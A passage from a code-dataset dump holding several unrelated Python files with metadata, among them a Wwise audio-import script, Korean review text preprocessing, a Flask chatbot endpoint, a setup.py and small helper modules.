\"WorkUnit\":\n ID = str(x[\"id\"])\n obj = x\n path = str(x[\"path\"])\n MyComponent.parentObject = obj\n MyComponent.parentObjectPath = path\n MyComponent.parentID = ID\n\n def ImportIntoWwiseUnderParentObject(parentObjectID):\n # subscribe to selection change?\n #print(\"Method to get the parent to create new object under\")\n success = False\n parID = parentObjectID\n\n #print(\"Selected object is...\")\n if parID != None:\n success = True\n if success:\n yield from getExistingAudioInWwise(str(parID))\n createExistingAudioList(MyComponent.WwiseQueryResults)\n setupAudioFilePath()\n count = 0\n for file in MyComponent.ImportAudioFileList:\n #print(file)\n f = file.rsplit('.')\n fname = os.path.basename(f[0])\n if not fname in MyComponent.ExistingWwiseAudio:\n yield setupImportArgs(parID, file, MyComponent.DefaultOriginalsPathForNewFiles)\n yield from importAudioFiles(MyComponent.importArgs)\n count += 1\n MyComponent.ImportOperationSuccess = True\n\n else:\n print(\"Something went wrong!!\")\n MyComponent.ImportOperationSuccess = False\n return\n\n if (MyComponent.ImportOperationSuccess):\n saveWwiseProject()\n endUndoGroup()\n print(\"Import 
operation success. \"+str(count)+\" new files imported.\")\n else:\n print(\"Import operation failed! Check log for errors!\")\n endUndoGroup()\n\n################### Main script flow ###################\n #### Establish Wwise connection\n try:\n res = yield from self.call(WAAPI_URI.ak_wwise_core_getinfo) # RPC call without arguments\n except Exception as ex:\n print(\"call error: {}\".format(ex))\n else:\n # Call was successful, displaying information from the payload.\n print(\"Hello {} {}\".format(res.kwresults['displayName'], res.kwresults['version']['displayName']))\n\n absPathToScript = \"\"\n\n #### If the sys args are longer than the default 1 (script name)\n if (len(sys.argv) > 1):\n if(len(sys.argv)) >= 2:\n setupBatchFileSysArgs()\n else:\n print(\"ERROR! Not enough arguments\")\n\n print(\"Arguments passed in...\"+str(sys.argv))\n currentWorkingDir = os.getcwd()\n print(\"Current Working Directory = \" + currentWorkingDir)\n\n\n yield from getProject()\n\n yield from getDefaultLanguage()\n\n #### Construct the import audio file path. Use Section name from args\n ## Construct the path down to the Originals section folder containing the files to import\n\n pathToOriginalFiles = os.path.join(MyComponent.pathToWwiseProject, *MyComponent.pathToOriginalsFromProjectRoot)\n pathToSectionFiles = os.path.join(pathToOriginalFiles,MyComponent.INPUT_SectionName)\n MyComponent.ImportAudioFilePath = os.path.abspath(pathToSectionFiles)\n\n\n\n\n\n\n if MyComponent.ImportAudioFilePath == '':\n print(\"Error. Directory not selected. Exiting application.\")\n self.leave()\n return\n\n beginUndoGroup()\n\n ## Get the Section work unit object and store ID and path\n yield from SetupImportParentObject(MyComponent.INPUT_SectionName)\n\n ## Main import function - Takes the ID of an object, to import files under.\n ## This method calls several other methods as it executes\n yield from ImportIntoWwiseUnderParentObject(MyComponent.parentID)\n\n exit()\n\n\n\n def onDisconnect(self):\n print(\"The client was disconnected.\")\n\n asyncio.get_event_loop().stop()\n\n\nif __name__ == '__main__':\n runner = ApplicationRunner(url=u\"ws://127.0.0.1:8095/waapi\", realm=u\"realm1\")\n try:\n runner.run(MyComponent)\n except Exception as e:\n print(type(e).__name__ + \": Is Wwise running and Wwise Authoring API enabled?\")\n","sub_path":"VoLAMSAutoImport/ImportNewAudioFilesAsDialogue_VR2_automated.py","file_name":"ImportNewAudioFilesAsDialogue_VR2_automated.py","file_ext":"py","file_size_in_byte":15046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525659577","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright 2018 NAVER Corp.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and\nassociated documentation files (the \"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial\nportions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\nINCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\nPARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\nHOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\nCONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport os\nimport re\n\nimport numpy as np\n\nfrom scipy.sparse import hstack\nfrom konlpy.tag import Twitter\n\nclass MovieReviewDataset():\n    \"\"\"\n    A Python object that reads the movie review data and returns it as (data, label) tuples.\n    \"\"\"\n    def __init__(self, dataset_path: str):\n        \"\"\"\n        initializer\n        :param dataset_path: root path of the dataset\n        :param max_length: maximum length of a string\n        \"\"\"\n        # paths to the data and the labels\n        data_review = os.path.join(dataset_path, 'train', 'train_data')\n        data_label = os.path.join(dataset_path, 'train', 'train_label')\n\n        # read the movie review data and run the preprocessing\n        with open(data_review, 'rt', encoding='utf-8') as f:\n            self.reviews = f.readlines()\n\n        # read the movie review labels and run the preprocessing.\n        with open(data_label) as f:\n            self.labels = [np.float32(x) for x in f.readlines()]\n\n\ndef regexp(texts):\n    twt = Twitter()\n    container = []\n    for i, sent in enumerate(texts):\n        if i % 200000 == 0:\n            print(i)\n        sent = re.sub('[\\,\\<\\>\\(\\)\\+\\-\\=\\&\\@\\#\\$]', '', sent)\n        sent = re.sub('\\.{2,}', ' .. ', sent)\n        sent = re.sub('\\~+', ' ~ ', sent)\n        sent = re.sub('\\!+', ' ! ', sent)\n        sent = re.sub('\\?+', ' ? ', sent)\n        sent = re.sub('(ac)', ' 99', sent)\n        sent = re.sub('(mv)', ' 88', sent)\n        sent = re.sub('ㅋ{1,}|ㅎ{1,}', 'ㅋ', sent)\n        sent = re.sub('ㅜ{1,}|ㅠ{1,}|ㅠㅜ|ㅜㅠ\\ㅡㅜ\\ㅜㅡ\\ㅡㅠ\\ㅠㅡ', 'ㅠㅠ', sent)\n        container.append(\" \".join(twt.morphs(sent)))\n    return container\n\ndef word_preprocessor(sent):\n    twt = Twitter()\n    sent = re.sub('[\\,\\<\\>\\(\\)\\+\\-\\=\\&\\@\\#\\$]', '', sent)\n    sent = re.sub('\\.{2,}', ' .. ', sent)\n    sent = re.sub('\\~+', ' ~ ', sent)\n    sent = re.sub('\\!+', ' ! ', sent)\n    sent = re.sub('\\?+', ' ? 
', sent)\n    sent = re.sub('(ac)', ' 99', sent)\n    sent = re.sub('(mv)', ' 88', sent)\n    sent = re.sub('ㅋ{1,}|ㅎ{1,}', 'ㅋ', sent)\n    sent = re.sub('ㅜ{1,}|ㅠ{1,}|ㅠㅜ|ㅜㅠ\\ㅡㅜ\\ㅜㅡ\\ㅡㅠ\\ㅠㅡ', 'ㅠㅠ', sent)\n    sent = \" \".join(twt.morphs(sent))\n    return sent\n\ndef char_preprocessor(sent):\n    sent = re.sub('[\\,\\<\\>\\(\\)\\+\\-\\=\\&\\@\\#\\$]', '', sent)\n    sent = re.sub('\\.{2,}', '..', sent)\n    sent = re.sub('\\~+', '~', sent)\n    sent = re.sub('\\!+', '!', sent)\n    sent = re.sub('\\?+', '?', sent)\n    sent = re.sub('(ac)', '', sent)\n    sent = re.sub('(mv)', '', sent)\n    sent = re.sub('ㅋ{1,}|ㅎ{1,}', 'ㅋ', sent)\n    sent = re.sub('ㅜ{1,}|ㅠ{1,}|ㅠㅜ|ㅜㅠ\\ㅡㅜ\\ㅜㅡ\\ㅡㅠ\\ㅠㅡ', 'ㅠㅠ', sent)\n    sent = re.sub('[1234567890]', '', sent)\n    return sent\n\n# 144570\ndef trn_val_separation(dataset: list, bound: int):\n    bound = -1 * bound\n    X_trn = dataset.reviews[:bound]\n    X_val = dataset.reviews[bound:]\n    Y_trn = dataset.labels[:bound]\n    Y_val = dataset.labels[bound:]\n\n    return X_trn, X_val, Y_trn, Y_val\n    \ndef vect_fit(review, vect_word, vect_char):\n    vect_word.fit(review)\n    vect_char.fit(review)\n    return vect_word, vect_char\n\ndef vect_transform(review, vect_word, vect_char):\n    df_word = vect_word.transform(review)\n    df_char = vect_char.transform(review)\n    return hstack([df_word, df_char]).tocsr()","sub_path":"movie-review_phase2/model_lr/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605705274","text":"import json\n\n\ndef modifyDictionarywithVariants(dictionary, variant_files):\n    variants = dict()\n    for file in variant_files:\n        with open(file) as json_file:\n            variants.update(dict(json.load(json_file)))\n    for key in variants.keys():\n        for variant in variants[key]:\n            try:\n                dictionary[variant.lower()] = dictionary[key].lower()\n            except:\n                continue\n    return dictionary","sub_path":"database/variants.py","file_name":"variants.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"99378112","text":"x = int(input())\n\nfor a in range(x + 1):\n    for b in range(a):\n        if a ** 5 - (b ** 5) == x:\n            print(a, b)\n            break\n        elif a ** 5 - ((-b) ** 5) == x:\n            print(a, b)\n            break\n","sub_path":"ABC/abc166/abc166_d.py","file_name":"abc166_d.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211681547","text":"\"\"\"extra traitlets\"\"\"\n# Copyright (c) Jupyter Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nfrom IPython.utils.traitlets import Unicode\n\nclass URLPrefix(Unicode):\n    def validate(self, obj, value):\n        u = super().validate(obj, value)\n        if not u.startswith('/'):\n            u = '/' + u\n        if not u.endswith('/'):\n            u = u + '/'\n        return u\n","sub_path":"jupyterhub/traitlets.py","file_name":"traitlets.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"70847102","text":"#How much change should be given to the buyer?\n\n#product cost\na = input(\"Product cost whole: \")\nb = input(\"Product cost trifle: \")\n\n#money received from the buyer\nc = input(\"whole: \")\nd = input(\"trifle: \")\n\nif (a > 0 and c > 0) or (0 < a == 0 < c):\n    x = a - c\n    print (abs(x))\nelse:\n    print ('0')\nif 0 < b != 0 < d:\n    y = b - d\n    print (abs(y))\nelif b > 0 and d == 0:\n    y = b - 100\n    print (abs(y))\nelif b == 0 and d > 0:\n    y = 
100 - d\n    print (y)\nelse:\n    print ('0')\n","sub_path":"Informatics/Boolean/Change.py","file_name":"Change.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243897223","text":"# -*- coding: utf-8 -*-\n\"\"\"This module provides a function for getting the building ID from the\n(preprocessed) street address attribute.\n\"\"\"\nimport numpy as np\nimport pandas as pd\n\ndef get_building_from_street_address(dataset):\n    \"\"\"Returns a DataFrame of the listings building ID calculated from\n    the listings street address, which can be used to fill missing\n    values.\n    \"\"\"\n    # Get each street address's corresponding building ID.\n    address_building_ids = {}\n\n    # For each valid building ID (ie not NaN), get the street addresses\n    # of the apartments in that building.\n    for building_id in dataset.building_id[pd.notna(dataset.building_id)].unique():\n        listings_in_building = dataset[dataset.building_id == building_id]\n\n        # Only unique addresses.\n        addresses = list(set(listings_in_building.street_address_preprocessed.values))\n\n        # Add each valid address to the dictionary, mapping to the current\n        # building ID.\n        for addr in addresses:\n            if addr and pd.notna(addr):\n                address_building_ids[addr] = building_id\n\n    def get_id(address):\n        \"\"\"Returns the street address's corresponding building ID.\"\"\"\n        try:\n            return address_building_ids[address]\n        except KeyError:\n            return np.nan\n    \n    building_ids_by_address = pd.DataFrame(\n        index=dataset.index,\n        data=dataset.street_address_preprocessed,\n        columns=['street_address_preprocessed']\n    )\n    building_id_estimates = building_ids_by_address.street_address_preprocessed.apply(get_id)\n    return building_id_estimates\n","sub_path":"src/preprocessing/building_id_by_street_address.py","file_name":"building_id_by_street_address.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"616347150","text":"#!/usr/bin/python\n# Project: BIOIN\n# Undergraduate thesis\n# Alejandro Valencia R.\n# Juan Jose Varela V.\n# Universidad del Valle\n\n# libraries to import\nimport subprocess as sp\nimport shlex as sl\nimport webbrowser\nimport threading\n\n\nclass Browser:\n\n    def __init__(self, project):\n        self.project = project\n\n    def worker(self):\n        comando2 = \"python3 -m http.server 8081\"\n        args2 = sl.split(comando2)\n        sp.call(args2)\n\n    def ejecutCommand(self):\n        # comando = \"cd /nucleotidesModule/genomeBrowsers/kablammo\"\n        # args = sl.split(comando)\n        # sp.call(args)\n        # start the server in the background so the interface is not blocked\n        thread = threading.Thread(target=self.worker)\n        thread.start()\n        url = \"http://localhost:8081/nucleotidesModule/genomeBrowsers/kablammo/\"\n        webbrowser.open(url)\n        # store the command to execute in a variable\n        # comando = \"./nucleotidesModule/genomeBrowsers/JBrowse-1.16.4-desktop-linux-x64/JBrowse-1.16.4-desktop\"\n\n        # split the string into a list so the commands can be passed properly from Python\n        # args = sl.split(comando)\n\n        # run subprocess's call function, which executes commands from the terminal\n        # sp.call(args)\n","sub_path":"BIOIN_0_1/src/nucleotidesModule/genomeBrowsers/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"23461287","text":"# -*- coding: utf-8 -*-\n#\n# 
Copyright (c) 2007 - 2014 -- Lars Heuer - Semagia .\n# All rights reserved.\n#\n# BSD license.\n#\n\"\"\"\\\nSetup script for deserializer.\n\"\"\"\ntry:\n    from setuptools import setup, find_packages\n    from setuptools.command.sdist import sdist as _sdist\nexcept ImportError:\n    from ez_setup import use_setuptools\n    use_setuptools()\n    from setuptools import setup, find_packages\n\n\nclass sdist(_sdist):\n    def make_release_tree(self, basedir, files):\n        from tm import plyutils\n        import sys\n        sys.path[0:0] = ['.', '..']\n        from mio.ltm import lexer, parser\n        plyutils.make_lexer(lexer)\n        plyutils._make_parser_for_sdist(parser)\n        files.extend(['mio/ltm/lexer_lextab.py', 'mio/ltm/parser_parsetab.py'])\n        _sdist.make_release_tree(self, basedir, files)\n\n\nsetup(\n    name='mio.ltm',\n    version='0.1.5',\n    description='Linear Topic Maps (LTM) syntax reader',\n    long_description='\\n\\n'.join([open('README.txt').read(), open('CHANGES.txt').read()]),\n    author='Lars Heuer',\n    author_email='mappa@googlegroups.com',\n    url='http://mappa.semagia.com/',\n    license='BSD',\n    packages=find_packages(),\n    namespace_packages=['mio'],\n    entry_points=\"\"\"\n    [mio.reader]\n    ltm = mio.ltm\n    \"\"\",\n    platforms='any',\n    zip_safe=False,\n    include_package_data=True,\n    package_data={'': ['*.txt']},\n    cmdclass={'sdist': sdist},\n    install_requires=['tm>=0.1.7'],\n    keywords=['Topic Maps', 'Semantic Web', 'LTM'],\n    classifiers=[\n        'Intended Audience :: Developers',\n        'Intended Audience :: Information Technology',\n        'Topic :: Software Development',\n        'Topic :: Software Development :: Libraries',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n        'License :: OSI Approved :: BSD License',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python',\n    ]\n)\n","sub_path":"mio.ltm/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"410701686","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Api\nfrom chatbot import chatbot_api\n\n\napp = Flask(__name__)\napi = Api(app)\nfelix = None\n\n@app.route('/', methods=['POST']) #only POST requests are allowed\ndef form_example():\n    if request.method == 'POST': #this block is only entered when the form is submitted\n        req_data = request.get_json()\n        sentence = req_data['input']\n        output = felix.predict(sentence)\n        return jsonify(\n            reply=output,\n        )\n\n\nif __name__ == '__main__':\n    felix = chatbot_api.Chatbot()\n    felix.run()\n    app.run(port='5002')","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"32298242","text":"import torch\nfrom torch import nn\n# create training dataset\ntrain_dataset=[[0, 0, 0, 0, 0, 0, 1],[1, 0, 1, 0, 0, 0, 1],\n               [1, 0, 0, 0, 0, 0, 1],[0, 0, 1, 0, 0, 0 ,1],\n               [2, 0, 0, 0, 0, 0, 1],[0, 1, 0, 0, 1, 1, 1],\n               [1, 1, 0, 1, 1, 1, 1],[1, 1, 0, 0, 1, 0, 1],\n               [1, 1, 1, 1, 1, 0, 0],[0, 2, 2, 0, 2, 1, 0],\n               [2, 2, 2, 2, 2, 0, 0],[2, 0, 0, 2, 2, 1, 0],\n               [0, 1, 0, 1, 0, 0, 0],[2, 1, 1, 1, 0, 0, 0],\n               [1, 1, 0, 0, 1, 1, 0],[2, 0, 0, 2, 2, 0, 0],\n               [0, 0, 1, 1, 1, 0, 0]\n]\n\n\ndef one_hot(input_data):\n    # load the data into a torch tensor and transpose it (turn M×n into n×M)\n    input_data_copy = torch.tensor(input_data).t()\n    # get the number of features and the number of samples\n    feature_num, data_num = input_data_copy.shape\n    # create a tensor to save the output\n    output_X = 
torch.tensor([])\n    for i in range(feature_num - 1): # the last dimension is the label\n        # compute feature i's dimension after one-hot encoding\n        output_X_i_shape = data_num, int(input_data_copy[i].max().item())+1\n        output_X_i = torch.zeros(output_X_i_shape, dtype=torch.float).scatter_(1, input_data_copy[i].view(-1,1), 1)\n        output_X = torch.cat((output_X, output_X_i), 1) # put the two matrices together\n    # get the label of each sample\n    output_y = input_data_copy[-1].view(-1, 1) * 2 - 1\n    return output_X, output_y.float()\n\n# test one_hot function\ntrain_X, train_y = one_hot(train_dataset)\nprint(train_X.shape) # 17×(3+3+3+3+3+2)\nprint(train_y.shape) # 17×1\n\n# add density and sugar content\nnew_feature = torch.tensor([[0.697, 0.460], [0.774, 0.376], [0.634, 0.264], [0.608, 0.318],\n                            [0.556, 0.215], [0.403, 0.237], [0.481, 0.149], [0.437, 0.211],\n                            [0.666, 0.091], [0.243, 0.267], [0.245, 0.057], [0.343, 0.099],\n                            [0.639, 0.161], [0.657, 0.198], [0.360, 0.370], [0.593, 0.042],\n                            [0.719, 0.103]\n])\ntrain_X = torch.cat((train_X, new_feature), 1)\nprint(train_X.shape)\n\ndef Loss(y_hat, y):\n    tmp = y * y_hat\n    l = (tmp < 0).float() * tmp\n    return abs(l).sum()\ndef createModel(input_channel, output_channel):\n    net = nn.Sequential(\n        nn.Linear(input_channel, output_channel)\n    )\n    return net\n\nclass TreeNode():\n    def __init__(self, model=None, predicted=-1, left=None, right=None):\n        self.model = model\n        self.predicted = predicted\n        self.left = left\n        self.right = right\n\n\ndef train(net, train_X, train_y, epochs, lr, print_frequency=0):\n    optim = torch.optim.SGD(net.parameters(), lr=lr)\n    for epoch in range(epochs):\n        optim.zero_grad()\n        y_hat = net(train_X)\n        l = Loss(train_y, y_hat)\n        l.backward()\n        optim.step()\n        if print_frequency:\n            if (epoch + 1) % print_frequency == 0:\n                print(\"epoch:%d, loss:%f\" % (epoch, l.item()))\n                print(\"epoch:%d, accuracy:%0.2f%%\\n\" % (epoch, evaluate(net, train_X, train_y)))\n\n\ndef evaluate(net, train_X, train_y):\n    y_hat = net(train_X)\n    y_hat = (y_hat >= 0).float() * 2 - 1\n    accuracy = 100 * (y_hat == train_y).sum().float() / len(train_y)\n    return accuracy\n\ndef createTree(tree, train_X, train_y, epochs, lr, precision):\n    if len(train_y) == 0:\n        return None\n    tree.model = createModel(train_X.shape[1], train_y.shape[1])\n    train(tree.model, train_X, train_y, epochs, lr)\n    # binarize the training set according to the predicted values\n    train_set = binaryTrainSet(tree.model, train_X, train_y)\n    # create left subtree\n    if len(train_set[0][1]) == 0 or evaluate(tree.model, train_set[0][0], train_set[0][1]) > precision:\n        tree.left = TreeNode(predicted=0)\n    else:\n        tree.left = TreeNode()\n        createTree(tree.left, train_set[0][0], train_set[0][1], epochs, lr, precision)\n\n    # create right subtree\n    if len(train_set[1][1]) == 0 or evaluate(tree.model, train_set[1][0], train_set[1][1]) > precision:\n        tree.right = TreeNode(predicted=1)\n    else:\n        tree.right = TreeNode()\n        createTree(tree.right, train_set[1][0], train_set[1][1], epochs, lr, precision)\n\ndef binaryTrainSet(net, train_X, train_y):\n    y_hat = net(train_X)\n    train_set = [[torch.tensor([]), []] for _ in range(2)] # create an empty list to store the result\n    for index in range(len(train_y)):\n        class_id = int(y_hat[index] >= 0)\n        train_set[class_id][0] = torch.cat((train_set[class_id][0], train_X[index].view(1, -1)), 0)\n        train_set[class_id][1].append(train_y[index].item())\n    for i in range(2):\n        train_set[i][1] = torch.tensor(train_set[i][1], dtype=torch.float).view(-1, 1)\n    return train_set\n\n\ntree = TreeNode()\ncreateTree(tree, 
train_X, train_y, 200, 0.01, 90)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"机器学习/机器学习-决策树/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"397487511","text":"# -*- coding: utf-8 -*-\n# \n# Archéo Lex – Pure Histoire de la Loi française\n# – builds a Git repository of French laws written in Markdown syntax\n# – this file is the base of the module and handles logging\n# \n# This program is free software. It comes without any warranty, to\n# the extent permitted by applicable law. You can redistribute it\n# and/or modify it under the terms of the Do What The Fuck You Want\n# To Public License, Version 2, as published by Sam Hocevar. See\n# the LICENSE file for more details.\n\n# Imports\nimport logging\nfrom logging.config import dictConfig\n\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'handlers': {\n        'null': {\n            'level': 'DEBUG',\n            'class': 'logging.NullHandler',\n        },\n        'console':{\n            'level': 'DEBUG',\n            'class': 'logging.StreamHandler',\n        },\n    },\n    'loggers': {\n        'peewee': {\n            'handlers': ['null'],\n            'level': 'DEBUG',\n            'propagate': False,\n        },\n        '': {\n            'handlers': ['console'],\n            'level': 'DEBUG',\n            'propagate': True,\n        }\n    }\n}\n\ndictConfig(LOGGING)\n\nlogger = logging.getLogger(__name__)\n\n","sub_path":"lexarcheo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}